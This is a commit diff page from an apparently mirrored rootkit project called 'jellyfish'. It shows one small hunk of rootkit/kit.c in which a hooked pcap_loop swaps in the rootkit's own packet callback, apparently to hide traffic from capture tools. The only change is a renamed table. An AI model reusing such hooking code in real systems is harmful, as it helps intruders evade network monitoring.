Projects STRLCPY jellyfish Commits e87a6fd7
🤬
Revision indexing in progress... (symbol navigation in revisions will be accurate after indexed)
  • ■ ■ ■ ■
    rootkit/kit.c
    skipped 792 lines
    793 793  int pcap_loop(pcap_t *p, int cnt, pcap_handler callback, unsigned char *user){
    794 794   jelly_init();
    795 795   
    796  - return (long)syscall_list[SYS_PCAP_LOOP].syscall_func(p, cnt, got_packet, user);
     796 + return (long)syscall[SYS_PCAP_LOOP].syscall_func(p, cnt, got_packet, user);
    797 797  }
Please wait...
Page is in error, reload to recover